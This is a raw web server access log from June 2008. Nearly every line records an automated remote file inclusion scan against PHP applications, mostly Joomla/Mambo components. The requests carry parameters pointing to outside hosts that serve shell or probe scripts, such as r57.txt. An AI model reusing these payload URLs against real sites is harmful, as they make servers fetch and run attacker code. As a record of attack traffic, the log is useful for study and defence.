74.53.178.146 - - [24/Jun/2008:12:26:15 -0700] "GET /logs/access_071201.log//port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:26:22 -0700] "GET /logs//port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:26:22 -0700] "GET //port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:26:31 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:26:32 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:26:32 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:26:34 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:26:34 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:26:35 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:26:35 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:26:35 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:26:41 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:26:41 -0700] "GET /errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:26:41 -0700] "GET /logs/errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:26:50 -0700] "GET /logs//port.php?content=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:26:50 -0700] "GET //port.php?content=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:26:57 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [24/Jun/2008:12:26:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:27:00 -0700] "GET /logs//port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:27:00 -0700] "GET //port.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:27:03 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:27:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:27:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:27:06 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:27:08 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:27:08 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:27:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:27:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:27:27 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:12:27:30 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:12:27:30 -0700] "GET //includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:12:27:35 -0700] "GET /logs//includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:27:54 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:27:55 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:27:55 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:27:55 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:27:56 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:27:56 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:27:56 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:27:56 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:27:56 -0700] "GET /logs/access_080507.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:28:00 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:28:00 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:28:00 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:28:19 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:28:20 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:28:20 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:28:20 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:28:30 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:28:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:28:41 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:28:41 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:28:52 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:28:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:28:53 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:28:54 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:28:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:29:00 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:29:01 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:29:01 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:29:35 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:29:37 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:29:38 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:29:50 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:29:50 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:12:29:52 -0700] "GET /index.php?sel=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 200 18471 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:29:59 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:30:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:30:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:30:03 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:30:07 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:30:08 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:30:20 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:30:22 -0700] "GET /logs/access_080120.log/errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:30:22 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:30:25 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:30:33 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:30:45 -0700] "GET /logs/access_080423.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:30:54 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:30:55 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:30:55 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:30:56 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:31:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:31:04 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:31:04 -0700] "GET /logs/access_080222.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:31:04 -0700] "GET /logs/access_080301.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:31:07 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:31:10 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:31:13 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:31:14 -0700] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:31:14 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:12:31:16 -0700] "GET /logs/main.php?x=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:12:31:17 -0700] "GET /main.php?x=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:31:27 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:31:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:31:41 -0700] "GET /logs/access_080301.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:31:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:31:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:31:49 -0700] "GET /logs/access_080222.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:12:31:57 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:12:31:57 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:32:05 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:32:05 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:32:06 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:32:11 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:13 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:14 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:14 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
